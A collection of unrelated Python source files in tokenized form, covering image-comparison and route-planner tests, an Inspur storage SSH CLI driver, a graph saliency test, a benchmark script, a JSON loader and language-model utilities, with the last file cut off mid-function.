<import_stmt>os<import_stmt>unittest<import_from_stmt>PIL Image<import_from_stmt>utils getdrawer abspath<import_from_stmt>helper assert_image_similar<class_stmt>TestRankingScreen(unittest.TestCase)<block_start>@classmethod<def_stmt>setUpClass cls<block_start>cls.tests=[]<line_sep>cls.update=<false><line_sep>cls.tests.append(getdrawer("" "syunn" (123123123 -1)))<line_sep>cls.tests.append(getdrawer("2" "syunn" (123123123 -1)))<block_end><def_stmt>testframes self<block_start><for_stmt>i range(len(self.tests))<block_start>drawer=self.tests[i][1]<line_sep>expectf=self.tests[i][0]+"rankingbruh.png"<for_stmt>x range(int(0.5<times>drawer.settings.fps))<block_start>drawer.draw_rankingpanel()<block_end><if_stmt>self.update<block_start>drawer.pbuffer.save(expectf)<block_end><else_stmt><block_start>expect=Image.open(expectf).convert("RGBA")<line_sep>assert_image_similar(drawer.pbuffer expect 5)<block_end>expectf=self.tests[i][0]+"rankingbruh1.png"<for_stmt>x range(int(0.6<times>drawer.settings.fps))<block_start>drawer.draw_rankingpanel()<block_end><if_stmt>self.update<block_start>drawer.pbuffer.save(expectf)<block_end><else_stmt><block_start>expect=Image.open(expectf).convert("RGBA")<line_sep>assert_image_similar(drawer.pbuffer expect 1)<block_end><block_end><block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>unittest.main()<block_end>
<import_stmt>math<import_stmt>unittest<import_stmt>carla<import_from_stmt>global_route_planner GlobalRoutePlanner<import_from_stmt>global_route_planner NavEnum<import_from_stmt>global_route_planner_dao GlobalRoutePlannerDAO<class_stmt>Test_GlobalRoutePlanner(unittest.TestCase)<block_start>""" Test class for GlobalRoutePlanner class """<def_stmt>setUp self# == Utilities test instance without DAO == # <block_start>self.simple_grp=GlobalRoutePlanner(<none>)<line_sep># == Integration test instance == # client=carla.Client('localhost' 2000)<line_sep>world=client.get_world()<line_sep>integ_dao=GlobalRoutePlannerDAO(world.get_map())<line_sep>self.integ_grp=GlobalRoutePlanner(integ_dao)<line_sep>self.integ_grp.setup()<line_sep><pass><block_end><def_stmt>tearDown self<block_start>self.simple_grp=<none><line_sep>self.dao_grp=<none><line_sep>self.integ_grp=<none><line_sep><pass><block_end><def_stmt>test_plan_route self<block_start>""" Test for GlobalRoutePlanner.plan_route() Run this test with carla server running Town03 """<line_sep>plan=self.integ_grp.plan_route((-60 -5) (-77.65 72.72))<line_sep>self.assertEqual(plan [NavEnum.START NavEnum.LEFT NavEnum.LEFT NavEnum.GO_STRAIGHT NavEnum.LEFT NavEnum.STOP])<block_end><def_stmt>test_path_search self<block_start>""" Test for GlobalRoutePlanner.path_search() Run this test with carla server running Town03 """<line_sep>self.integ_grp.path_search((191.947 -5.602) (78.730 -50.091))<line_sep>self.assertEqual(self.integ_grp.path_search((196.947 -5.602) (78.730 -50.091)) [256 157 158 117 118 59 55 230])<block_end><def_stmt>test_localise self<block_start>""" Test for GlobalRoutePlanner.localise() Run this test with carla server running Town03 """<line_sep>x,y=(200 -250)<line_sep>segment=self.integ_grp.localise(x y)<line_sep>self.assertEqual(self.integ_grp._id_map[segment['entry']] 5)<line_sep>self.assertEqual(self.integ_grp._id_map[segment['exit']] 225)<block_end><def_stmt>test_unit_vector self<block_start>""" Test for GlobalRoutePlanner.unit_vector() """<line_sep>vector=self.simple_grp.unit_vector((1 1) (2 2))<line_sep>self.assertAlmostEqual(vector[0] 1/math.sqrt(2))<line_sep>self.assertAlmostEqual(vector[1] 1/math.sqrt(2))<block_end><def_stmt>test_dot self<block_start>""" Test for GlobalRoutePlanner.dot() """<line_sep>self.assertAlmostEqual(self.simple_grp.dot((1 0) (0 1)) 0)<line_sep>self.assertAlmostEqual(self.simple_grp.dot((1 0) (1 0)) 1)<block_end><block_end><def_stmt>suite <block_start>""" Gathering all tests """<line_sep>suite=unittest.TestSuite()<line_sep>suite.addTest(Test_GlobalRoutePlanner('test_unit_vector'))<line_sep>suite.addTest(Test_GlobalRoutePlanner('test_dot'))<line_sep>suite.addTest(Test_GlobalRoutePlanner('test_localise'))<line_sep>suite.addTest(Test_GlobalRoutePlanner('test_path_search'))<line_sep>suite.addTest(Test_GlobalRoutePlanner('test_plan_route'))<line_sep><return>suite<block_end><if_stmt>__name__<eq>'__main__'<block_start>""" Running test suite """<line_sep>mySuit=suite()<line_sep>runner=unittest.TextTestRunner()<line_sep>runner.run(mySuit)<block_end>
# Copyright 2019 Inspur Corp. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """ CLI helpers for Inspur InStorage """<import_stmt>paramiko<import_stmt>re<import_stmt>six<import_from_stmt>eventlet greenthread<import_from_stmt>oslo_concurrency processutils<import_from_stmt>oslo_log log<import_from_stmt>oslo_utils excutils<import_from_stmt>manila exception<import_from_stmt>manila.i18n _<import_from_stmt>manila utils<as>manila_utils<line_sep>LOG=log.getLogger(__name__)<class_stmt>SSHRunner(object)<block_start>"""SSH runner is used to run ssh command on inspur instorage system."""<def_stmt>__init__ self host port login password privatekey=<none><block_start>self.host=host<line_sep>self.port=port<line_sep>self.login=login<line_sep>self.password=password<line_sep>self.privatekey=privatekey<line_sep>self.ssh_conn_timeout=60<line_sep>self.ssh_min_pool_size=1<line_sep>self.ssh_max_pool_size=10<line_sep>self.sshpool=<none><block_end><def_stmt>__call__ self cmd_list check_exit_code=<true> attempts=1<block_start>"""SSH tool"""<line_sep>manila_utils.check_ssh_injection(cmd_list)<line_sep>command=' '.join(cmd_list)<if_stmt><not>self.sshpool<block_start><try_stmt><block_start>self.sshpool=manila_utils.SSHPool(self.host self.port self.ssh_conn_timeout self.login password=self.password privatekey=self.privatekey min_size=self.ssh_min_pool_size max_size=self.ssh_max_pool_size)<block_end><except_stmt>paramiko.SSHException<block_start>LOG.error("Unable to create SSHPool")<line_sep><raise><block_end><block_end><try_stmt><block_start><return>self._ssh_execute(self.sshpool command check_exit_code attempts)<block_end><except_stmt>Exception<block_start>LOG.error("Error running SSH command: %s" command)<line_sep><raise><block_end><block_end><def_stmt>_ssh_execute self sshpool command check_exit_code=<true> attempts=1<block_start><try_stmt><block_start><with_stmt>sshpool.item()<as>ssh<block_start>last_exception=<none><while_stmt>attempts<g>0<block_start>attempts<augsub>1<try_stmt><block_start><return>processutils.ssh_execute(ssh command check_exit_code=check_exit_code)<block_end><except_stmt>Exception<as>e<block_start>LOG.exception('Error has occurred')<line_sep>last_exception=e<line_sep>greenthread.sleep(1)<block_end><block_end><try_stmt><block_start><raise>processutils.ProcessExecutionError(exit_code=last_exception.exit_code stdout=last_exception.stdout stderr=last_exception.stderr cmd=last_exception.cmd)<block_end><except_stmt>AttributeError<block_start><raise>processutils.ProcessExecutionError(exit_code=-1 stdout="" stderr="Error running SSH command" cmd=command)<block_end><block_end><block_end><except_stmt>Exception<block_start><with_stmt>excutils.save_and_reraise_exception()<block_start>LOG.error("Error running SSH command: %s" command)<block_end><block_end><block_end><block_end><class_stmt>CLIParser(object)<block_start>"""Parse MCS CLI output and generate iterable."""<def_stmt>__init__ self raw ssh_cmd=<none> delim='!' 
with_header=<true><block_start>super(CLIParser self).__init__()<if_stmt>ssh_cmd<block_start>self.ssh_cmd=' '.join(ssh_cmd)<block_end><else_stmt><block_start>self.ssh_cmd='None'<block_end>self.raw=raw<line_sep>self.delim=delim<line_sep>self.with_header=with_header<line_sep>self.result=self._parse()<block_end><def_stmt>__getitem__ self key<block_start><try_stmt><block_start><return>self.result[key]<block_end><except_stmt>KeyError<block_start>msg=(_('Did not find the expected key %(key)s in %(fun)s: '<concat>'%(raw)s.')%{'key':key 'fun':self.ssh_cmd 'raw':self.raw})<line_sep><raise>exception.ShareBackendException(msg=msg)<block_end><block_end><def_stmt>__iter__ self<block_start><for_stmt>a self.result<block_start><yield>a<block_end><block_end><def_stmt>__len__ self<block_start><return>len(self.result)<block_end><def_stmt>_parse self<block_start><def_stmt>get_reader content delim<block_start><for_stmt>line content.lstrip().splitlines()<block_start>line=line.strip()<if_stmt>line<block_start><yield>line.split(delim)<block_end><else_stmt><block_start><yield>[]<block_end><block_end><block_end><if_stmt>isinstance(self.raw six.string_types)<block_start>stdout,stderr=self.raw ''<block_end><else_stmt><block_start>stdout,stderr=self.raw<block_end>reader=get_reader(stdout self.delim)<line_sep>result=[]<if_stmt>self.with_header<block_start>hds=tuple()<for_stmt>row reader<block_start>hds=row<line_sep><break><block_end><for_stmt>row reader<block_start>cur=dict()<if_stmt>len(hds)<ne>len(row)<block_start>msg=(_('Unexpected CLI response: header/row mismatch. '<concat>'header: %(header)s, row: %(row)s.')%{'header':hds 'row':row})<line_sep><raise>exception.ShareBackendException(msg=msg)<block_end><for_stmt>k,v zip(hds row)<block_start>CLIParser.append_dict(cur k v)<block_end>result.append(cur)<block_end><block_end><else_stmt><block_start>cur=dict()<for_stmt>row reader<block_start><if_stmt>row<block_start>CLIParser.append_dict(cur row[0] ' '.join(row[1:]))<block_end><elif_stmt>cur# start new section <block_start>result.append(cur)<line_sep>cur=dict()<block_end><block_end><if_stmt>cur<block_start>result.append(cur)<block_end><block_end><return>result<block_end>@staticmethod<def_stmt>append_dict dict_ key value<block_start>key,value=key.strip() value.strip()<line_sep>obj=dict_.get(key <none>)<if_stmt>obj<is><none><block_start>dict_[key]=value<block_end><elif_stmt>isinstance(obj list)<block_start>obj.append(value)<line_sep>dict_[key]=obj<block_end><else_stmt><block_start>dict_[key]=[obj value]<block_end><return>dict_<block_end><block_end><class_stmt>InStorageSSH(object)<block_start>"""SSH interface to Inspur InStorage systems."""<def_stmt>__init__ self ssh_runner<block_start>self._ssh=ssh_runner<block_end><def_stmt>_run_ssh self ssh_cmd<block_start><try_stmt><block_start><return>self._ssh(ssh_cmd)<block_end><except_stmt>processutils.ProcessExecutionError<as>e<block_start>msg=(_('CLI Exception output:\n command: %(cmd)s\n '<concat>'stdout: %(out)s\n stderr: %(err)s.')%{'cmd':ssh_cmd 'out':e.stdout 'err':e.stderr})<line_sep>LOG.error(msg)<line_sep><raise>exception.ShareBackendException(msg=msg)<block_end><block_end><def_stmt>run_ssh_inq self ssh_cmd delim='!' 
with_header=<false><block_start>"""Run an SSH command and return parsed output."""<line_sep>raw=self._run_ssh(ssh_cmd)<line_sep>LOG.debug('Response for cmd %s is %s' ssh_cmd raw)<line_sep><return>CLIParser(raw ssh_cmd=ssh_cmd delim=delim with_header=with_header)<block_end><def_stmt>run_ssh_assert_no_output self ssh_cmd<block_start>"""Run an SSH command and assert no output returned."""<line_sep>out,err=self._run_ssh(ssh_cmd)<if_stmt>len(out.strip())<ne>0<block_start>msg=(_('Expected no output from CLI command %(cmd)s, '<concat>'got %(out)s.')%{'cmd':' '.join(ssh_cmd) 'out':out})<line_sep>LOG.error(msg)<line_sep><raise>exception.ShareBackendException(msg=msg)<block_end><block_end><def_stmt>run_ssh_check_created self ssh_cmd<block_start>"""Run an SSH command and return the ID of the created object."""<line_sep>out,err=self._run_ssh(ssh_cmd)<try_stmt><block_start>match_obj=re.search(r'\[([0-9]+)\],? successfully created' out)<line_sep><return>match_obj.group(1)<block_end><except_stmt>(AttributeError IndexError)<block_start>msg=(_('Failed to parse CLI output:\n command: %(cmd)s\n '<concat>'stdout: %(out)s\n stderr: %(err)s.')%{'cmd':ssh_cmd 'out':out 'err':err})<line_sep>LOG.error(msg)<line_sep><raise>exception.ShareBackendException(msg=msg)<block_end><block_end><def_stmt>lsnode self node_id=<none><block_start>with_header=<true><line_sep>ssh_cmd=['mcsinq' 'lsnode' '-delim' '!']<if_stmt>node_id<block_start>with_header=<false><line_sep>ssh_cmd.append(node_id)<block_end><return>self.run_ssh_inq(ssh_cmd with_header=with_header)<block_end><def_stmt>lsnaspool self pool_id=<none><block_start>ssh_cmd=['mcsinq' 'lsnaspool' '-delim' '!']<if_stmt>pool_id<block_start>ssh_cmd.append(pool_id)<block_end><return>self.run_ssh_inq(ssh_cmd with_header=<true>)<block_end><def_stmt>lsfs self node_name=<none> fsname=<none><block_start><if_stmt>fsname<and><not>node_name<block_start>msg=_('Node name should be set when file system name is set.')<line_sep>LOG.error(msg)<line_sep><raise>exception.InvalidParameterValue(msg)<block_end>ssh_cmd=['mcsinq' 'lsfs' '-delim' '!']<line_sep>to_append=[]<if_stmt>node_name<block_start>to_append<augadd>['-node' '"%s"'%node_name]<block_end><if_stmt>fsname<block_start>to_append<augadd>['-name' '"%s"'%fsname]<block_end><if_stmt><not>to_append<block_start>to_append<augadd>['-all']<block_end>ssh_cmd<augadd>to_append<line_sep><return>self.run_ssh_inq(ssh_cmd with_header=<true>)<block_end><def_stmt>addfs self fsname pool_name size node_name<block_start>"""Create a file system on the storage. :param fsname: file system name :param pool_name: pool in which to create the file system :param size: file system size in GB :param node_name: the primary node name :return: """<line_sep>ssh_cmd=['mcsop' 'addfs' '-name' '"%s"'%fsname '-pool' '"%s"'%pool_name '-size' '%dg'%size '-node' '"%s"'%node_name]<line_sep>self.run_ssh_assert_no_output(ssh_cmd)<block_end><def_stmt>rmfs self fsname<block_start>"""Remove the specific file system. :param fsname: file system name to be removed :return: """<line_sep>ssh_cmd=['mcsop' 'rmfs' '-name' '"%s"'%fsname]<line_sep>self.run_ssh_assert_no_output(ssh_cmd)<block_end><def_stmt>expandfs self fsname size<block_start>"""Expand the space of the specific file system. 
:param fsname: file system name :param size: the size(GB) to be expanded, origin + size = result :return: """<line_sep>ssh_cmd=['mcsop' 'expandfs' '-name' '"%s"'%fsname '-size' '%dg'%size]<line_sep>self.run_ssh_assert_no_output(ssh_cmd)<block_end># NAS directory operation <def_stmt>lsnasdir self dirpath<block_start>"""List the child directory under dirpath. :param dirpath: the parent directory to list with :return: """<line_sep>ssh_cmd=['mcsinq' 'lsnasdir' '-delim' '!' '"%s"'%dirpath]<line_sep><return>self.run_ssh_inq(ssh_cmd with_header=<true>)<block_end><def_stmt>addnasdir self dirpath<block_start>"""Create a new NAS directory indicated by dirpath."""<line_sep>ssh_cmd=['mcsop' 'addnasdir' '"%s"'%dirpath]<line_sep>self.run_ssh_assert_no_output(ssh_cmd)<block_end><def_stmt>chnasdir self old_path new_path<block_start>"""Rename the NAS directory name."""<line_sep>ssh_cmd=['mcsop' 'chnasdir' '-oldpath' '"%s"'%old_path '-newpath' '"%s"'%new_path]<line_sep>self.run_ssh_assert_no_output(ssh_cmd)<block_end><def_stmt>rmnasdir self dirpath<block_start>"""Remove the specific dirpath."""<line_sep>ssh_cmd=['mcsop' 'rmnasdir' '"%s"'%dirpath]<line_sep>self.run_ssh_assert_no_output(ssh_cmd)<block_end># NFS operation <def_stmt>rmnfs self share_path<block_start>"""Remove the NFS indicated by path."""<line_sep>ssh_cmd=['mcsop' 'rmnfs' '"%s"'%share_path]<line_sep>self.run_ssh_assert_no_output(ssh_cmd)<block_end><def_stmt>lsnfslist self prefix=<none><block_start>"""List NFS shares on a system."""<line_sep>ssh_cmd=['mcsinq' 'lsnfslist' '-delim' '!']<if_stmt>prefix<block_start>ssh_cmd.append('"%s"'%prefix)<block_end><return>self.run_ssh_inq(ssh_cmd with_header=<true>)<block_end><def_stmt>lsnfsinfo self share_path<block_start>"""List a specific NFS share's information."""<line_sep>ssh_cmd=['mcsinq' 'lsnfsinfo' '-delim' '!' '"%s"'%share_path]<line_sep><return>self.run_ssh_inq(ssh_cmd with_header=<true>)<block_end><def_stmt>addnfsclient self share_path client_spec<block_start>"""Add a client access rule to NFS share. :param share_path: the NFS share path. :param client_spec: IP/MASK:RIGHTS:ALL_SQUASH:ROOT_SQUASH. :return: """<line_sep>ssh_cmd=['mcsop' 'addnfsclient' '-path' '"%s"'%share_path '-client' client_spec]<line_sep>self.run_ssh_assert_no_output(ssh_cmd)<block_end><def_stmt>chnfsclient self share_path client_spec<block_start>"""Change a NFS share's client info."""<line_sep>ssh_cmd=['mcsop' 'chnfsclient' '-path' '"%s"'%share_path '-client' client_spec]<line_sep>self.run_ssh_assert_no_output(ssh_cmd)<block_end><def_stmt>rmnfsclient self share_path client_spec<block_start>"""Remove a client info from the NFS share."""<line_sep># client_spec parameter for rmnfsclient is IP/MASK, # so we need remove the right part client_spec=client_spec.split(':')[0]<line_sep>ssh_cmd=['mcsop' 'rmnfsclient' '-path' '"%s"'%share_path '-client' client_spec]<line_sep>self.run_ssh_assert_no_output(ssh_cmd)<block_end># CIFS operation <def_stmt>lscifslist self filter=<none><block_start>"""List CIFS shares on the system."""<line_sep>ssh_cmd=['mcsinq' 'lscifslist' '-delim' '!']<if_stmt>filter<block_start>ssh_cmd.append('"%s"'%filter)<block_end><return>self.run_ssh_inq(ssh_cmd with_header=<true>)<block_end><def_stmt>lscifsinfo self share_name<block_start>"""List a specific CIFS share's information."""<line_sep>ssh_cmd=['mcsinq' 'lscifsinfo' '-delim' '!' 
'"%s"'%share_name]<line_sep><return>self.run_ssh_inq(ssh_cmd with_header=<true>)<block_end><def_stmt>addcifs self share_name dirpath oplocks='off'<block_start>"""Create a CIFS share with given path."""<line_sep>ssh_cmd=['mcsop' 'addcifs' '-name' share_name '-path' dirpath '-oplocks' oplocks]<line_sep>self.run_ssh_assert_no_output(ssh_cmd)<block_end><def_stmt>rmcifs self share_name<block_start>"""Remove a CIFS share."""<line_sep>ssh_cmd=['mcsop' 'rmcifs' share_name]<line_sep>self.run_ssh_assert_no_output(ssh_cmd)<block_end><def_stmt>chcifs self share_name oplocks='off'<block_start>"""Change a CIFS share's attribute. :param share_name: share's name :param oplocks: 'off' or 'on' :return: """<line_sep>ssh_cmd=['mcsop' 'chcifs' '-name' share_name '-oplocks' oplocks]<line_sep>self.run_ssh_assert_no_output(ssh_cmd)<block_end><def_stmt>addcifsuser self share_name rights<block_start>"""Add a user access rule to CIFS share. :param share_name: share's name :param rights: [LU|LG]:xxx:[rw|ro] :return: """<line_sep>ssh_cmd=['mcsop' 'addcifsuser' '-name' share_name '-rights' rights]<line_sep>self.run_ssh_assert_no_output(ssh_cmd)<block_end><def_stmt>chcifsuser self share_name rights<block_start>"""Change a user access rule."""<line_sep>ssh_cmd=['mcsop' 'chcifsuser' '-name' share_name '-rights' rights]<line_sep>self.run_ssh_assert_no_output(ssh_cmd)<block_end><def_stmt>rmcifsuser self share_name rights<block_start>"""Remove CIFS user from a CIFS share."""<line_sep># the rights parameter for rmcifsuser is LU:NAME rights=':'.join(rights.split(':')[0:-1])<line_sep>ssh_cmd=['mcsop' 'rmcifsuser' '-name' share_name '-rights' rights]<line_sep>self.run_ssh_assert_no_output(ssh_cmd)<block_end># NAS port ip <def_stmt>lsnasportip self<block_start>"""List NAS service port ip address."""<line_sep>ssh_cmd=['mcsinq' 'lsnasportip' '-delim' '!']<line_sep><return>self.run_ssh_inq(ssh_cmd with_header=<true>)<block_end><block_end>
# -*- coding: utf-8 -*- # # Copyright 2018-2020 Data61, CSIRO # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. <import_stmt>pytest<import_from_stmt>stellargraph.interpretability.saliency_maps IntegratedGradientsGAT<import_stmt>numpy<as>np<import_from_stmt>stellargraph.layer GAT<import_from_stmt>stellargraph.mapper FullBatchNodeGenerator<import_from_stmt>tensorflow.keras Model<import_from_stmt>tensorflow.keras.optimizers Adam<import_from_stmt>tensorflow.keras.losses categorical_crossentropy<import_stmt>networkx<as>nx<import_from_stmt>tensorflow.keras backend<as>K<import_from_stmt>..test_utils.graphs example_graph_1_saliency_maps<as>example_graph_1<def_stmt>create_GAT_model graph<block_start>generator=FullBatchNodeGenerator(graph sparse=<false> method=<none>)<line_sep>train_gen=generator.flow([0 1] np.array([[1 0] [0 1]]))<line_sep>gat=GAT(layer_sizes=[2 2] generator=generator bias=<false> in_dropout=0 attn_dropout=0 activations=["elu" "softmax"] normalize=<none> saliency_map_support=<true> )<for_stmt>layer gat._layers<block_start>layer._initializer="ones"<block_end>x_inp,x_out=gat.in_out_tensors()<line_sep>keras_model=Model(inputs=x_inp outputs=x_out)<line_sep><return>gat keras_model generator train_gen<block_end><def_stmt>get_ego_node_num graph target_idx<block_start>G_ego=nx.ego_graph(graph target_idx radius=2)<line_sep><return>G_ego.number_of_nodes()<block_end><def_stmt>test_ig_saliency_map <block_start>graph=example_graph_1(feature_size=4)<line_sep>base_model,keras_model_gat,generator,train_gen=create_GAT_model(graph)<line_sep>keras_model_gat.compile(optimizer=Adam(lr=0.1) loss=categorical_crossentropy weighted_metrics=["acc"])<line_sep>weights=[np.array([[0.47567585 0.7989239] [0.33588523 0.19814175] [0.15685713 0.43643117] [0.7725941 0.68441933] ]) np.array([[0.71832293] [0.8542117]]) np.array([[0.46560588] [0.8165422]]) np.array(1.0) np.array(0.0) np.array([[0.4391179 0.595691] [0.06000895 0.2613866]]) np.array([[0.43496376] [0.02840129]]) np.array([[0.33972418] [0.22352563]]) np.array(1.0) np.array(0.0) ]<line_sep>keras_model_gat.set_weights(weights)<line_sep># sanity check to make sure that the values of delta and non_exist_edges are not trainable # the expected value should be delta = 1.0 and non_exist_edges = 0.0 <for_stmt>var keras_model_gat.non_trainable_weights<block_start><if_stmt>"ig_delta"<in>var.name<block_start><assert_stmt>K.get_value(var)<eq>1.0<block_end><if_stmt>"ig_non_exist_edge"<in>var.name<block_start><assert_stmt>K.get_value(var)<eq>0.0<block_end><block_end>ig_saliency=IntegratedGradientsGAT(keras_model_gat train_gen generator.node_list)<line_sep>target_id=0<line_sep>class_of_interest=0<line_sep>ig_link_importance=ig_saliency.get_link_importance(target_id class_of_interest steps=200)<line_sep>print(ig_link_importance)<line_sep>ig_link_importance_ref=np.array([[4.759e-11 4.759e-11 4.759e-11 0 0] [-1.442e-10 -1.442e-10 0 0 0] [1.183e-10 0 1.183e-10 1.183e-10 0] [0 0 0 0 0] [0 0 0 0 0] ])<line_sep># Check the number of non-zero elements in the node importance matrix. 
# We expect the number to be the same as the number of nodes in the ego network. <assert_stmt>pytest.approx(np.sum(np.ma.masked_array(ig_link_importance mask=train_gen.A_dense)) 0)<line_sep># TODO: write a better comparison test with larger floating point values # commented out test because of floating point errors # assert ig_link_importance == pytest.approx(ig_link_importance_ref, abs=1e-11) non_zero_edge_importance=np.sum(np.abs(ig_link_importance)<g>1e-11)<assert_stmt>8<eq>non_zero_edge_importance<line_sep>ig_node_importance=ig_saliency.get_node_importance(target_id class_of_interest steps=200)<line_sep>print(ig_node_importance)<assert_stmt>pytest.approx(ig_node_importance np.array([-13.06 -9.32 -7.46 -3.73 0]))<line_sep>non_zero_node_importance=np.sum(np.abs(ig_node_importance)<g>1e-5)<assert_stmt>4<eq>non_zero_node_importance<block_end>
<import_stmt>tensorflow<import_from_stmt>tensorflow.keras.datasets cifar10<import_from_stmt>tensorflow keras<import_stmt>numpy<as>np<line_sep>num_classes=10<class_stmt>EvalDataset(object)<block_start><def_stmt>__init__ self batch_size=100<block_start>(x_train y_train),(x_test y_test)=cifar10.load_data()<line_sep>x_train=x_train.astype('float32')/255<line_sep>x_test=x_test.astype('float32')/255<line_sep># If subtract pixel mean is enabled x_train_mean=np.mean(x_train axis=0)<line_sep>x_train<augsub>x_train_mean<line_sep>x_test<augsub>x_train_mean<line_sep># Convert class vectors to binary class matrices. y_train=tensorflow.keras.utils.to_categorical(y_train num_classes)<line_sep>y_test=tensorflow.keras.utils.to_categorical(y_test num_classes)<line_sep>self.test_images=x_test<line_sep>self.test_labels=y_test<block_end><def_stmt>__len__ self<block_start><return>len(self.test_images)<block_end><def_stmt>__getitem__ self idx<block_start><return>self.test_images[idx] self.test_labels[idx]<block_end><block_end><import_from_stmt>neural_compressor.experimental Benchmark common<line_sep>evaluator=Benchmark('benchmark.yaml')<line_sep>evaluator.model=common.Model('./baseline_model')<line_sep>evaluator.b_dataloader=common.DataLoader(EvalDataset())<line_sep>evaluator('performance')<line_sep>
# Copyright 2019-2020 Lawrence Livermore National Security, LLC and other # Archspec Project Developers. See the top-level COPYRIGHT file for details. # # SPDX-License-Identifier: (Apache-2.0 OR MIT) """Global objects with the content of the microarchitecture JSON file and its schema """<import_stmt>json<import_stmt>os.path<try_stmt><block_start><import_from_stmt>collections.abc MutableMapping# novm <block_end><except_stmt>ImportError<block_start><import_from_stmt>collections MutableMapping<block_end><class_stmt>LazyDictionary(MutableMapping)<block_start>"""Lazy dictionary that gets constructed on first access to any object key Args: factory (callable): factory function to construct the dictionary """<def_stmt>__init__ self factory *args **kwargs<block_start>self.factory=factory<line_sep>self.args=args<line_sep>self.kwargs=kwargs<line_sep>self._data=<none><block_end>@property<def_stmt>data self<block_start>"""Returns the lazily constructed dictionary"""<if_stmt>self._data<is><none><block_start>self._data=self.factory(*self.args **self.kwargs)<block_end><return>self._data<block_end><def_stmt>__getitem__ self key<block_start><return>self.data[key]<block_end><def_stmt>__setitem__ self key value<block_start>self.data[key]=value<block_end><def_stmt>__delitem__ self key<block_start><del_stmt>self.data[key]<block_end><def_stmt>__iter__ self<block_start><return>iter(self.data)<block_end><def_stmt>__len__ self<block_start><return>len(self.data)<block_end><block_end><def_stmt>_load_json_file json_file<block_start>json_dir=os.path.join(os.path.dirname(__file__) ".." "json" "cpu")<line_sep>json_dir=os.path.abspath(json_dir)<def_stmt>_factory <block_start>filename=os.path.join(json_dir json_file)<with_stmt>open(filename "r")<as>file<block_start><return>json.load(file)<block_end><block_end><return>_factory<block_end>#: In memory representation of the data in microarchitectures.json, #: loaded on first access TARGETS_JSON=LazyDictionary(_load_json_file("microarchitectures.json"))<line_sep>#: JSON schema for microarchitectures.json, loaded on first access SCHEMA=LazyDictionary(_load_json_file("microarchitectures_schema.json"))<line_sep>
# Copyright 2017 Battelle Energy Alliance, LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. <import_stmt>numpy<as>np<line_sep>#static seed np.random.seed(42)<def_stmt>run raven Inputs<block_start>coeffs=[1 1 0]# ax + by + c = 0 -> x = y raven.ans=main(coeffs raven.x raven.y)<block_end>#+ random(scale=raven.stoch)/10 <def_stmt>main coeffs x y thresh=0.01<block_start>distance=dist_to_line(coeffs x y)<line_sep>z=3<times>(x+0.5)<power>2+3<times>(y-0.5)<power>2<line_sep>z<augadd>distance<times>10<line_sep><return>z<block_end><def_stmt>dist_to_line coeffs x0 y0<block_start>cx,cy=closest_point(coeffs x0 y0)<line_sep>dist=np.sqrt((x0-cx)<power>2+(y0-cy)<power>2)<line_sep><return>dist<block_end><def_stmt>closest_point coeffs x0 y0<block_start>a,b,c=coeffs<line_sep>denom=a<times>a+b<times>b<line_sep>x=b<times>(b<times>x0-a<times>y0)-a<times>c<line_sep>x<augdiv>denom<line_sep>y=a<times>(-b<times>x0+a<times>y0)-b<times>c<line_sep>y<augdiv>denom<line_sep><return>x y<block_end><def_stmt>random scale=0.5 loc=-1.0<block_start><return>scale<times>(2.<times>np.random.rand()+loc)<block_end>
# Modified from: https://github.com/litian96/FedProx/blob/master/flearn/utils/language_utils.py # credit goes to: <NAME> (litian96 @ GitHub) """Utils for language models."""<import_stmt>re<import_stmt>numpy<as>np<import_stmt>torch<line_sep># ------------------------ # utils for shakespeare dataset ALL_LETTERS="\n !\"&'(),-.0123456789:;>?ABCDEFGHIJKLMNOPQRSTUVWXYZ[]abcdefghijklmnopqrstuvwxyz}"<line_sep>NUM_LETTERS=len(ALL_LETTERS)<def_stmt>_one_hot index size<block_start>'''returns one-hot vector with given size and value 1 at given index '''<line_sep>vec=[0<for>_ range(size)]<line_sep>vec[int(index)]=1<line_sep><return>vec<block_end><def_stmt>letter_to_vec letter<block_start>'''returns one-hot representation of given letter '''<line_sep>index=ALL_LETTERS.find(letter)<line_sep><return>_one_hot(index NUM_LETTERS)<block_end><def_stmt>word_to_indices word<block_start>'''returns a list of character indices Args: word: string Return: indices: int list with length len(word) '''<line_sep>indices=[]<for_stmt>c word<block_start>indices.append(ALL_LETTERS.find(c))<block_end><return>indices<block_end># ------------------------ # utils for sent140 dataset <def_stmt>split_line line<block_start>'''split given line/phrase into list of words Args: line: string representing phrase to be split Return: list of strings, with each string representing a word '''<line_sep><return>re.findall(r"[\w']+|[.,!?;]" line)<block_end><def_stmt>_word_to_index word indd<block_start>'''returns index of given word based on given lookup dictionary returns the length of the lookup dictionary if word not found Args: word: string indd: dictionary with string words as keys and int indices as values '''<if_stmt>word<in>indd<block_start><return>indd[word]<block_end><else_stmt><block_start><return>len(indd)<block_end><block_end><def_stmt>line_to_indices line word2id max_words=25<block_start>'''converts given phrase into list of word indices if the phrase has more than max_words words, returns a list containing indices of the first max_words words if the phrase has less than max_words words, repeatedly appends integer representing unknown index to returned list until the list's length is max_words Args: line: string representing phrase/sequence of words word2id: dictionary with string words as keys and int indices as values max_words: maximum number of word indices in returned list Return: indl: list of word indices, one index for each word in phrase '''<line_sep>unk_id=len(word2id)<line_sep>line_list=split_line(line)# split phrase in words indl=[word2id[w]<if>w<in>word2id<else>unk_id<for>w 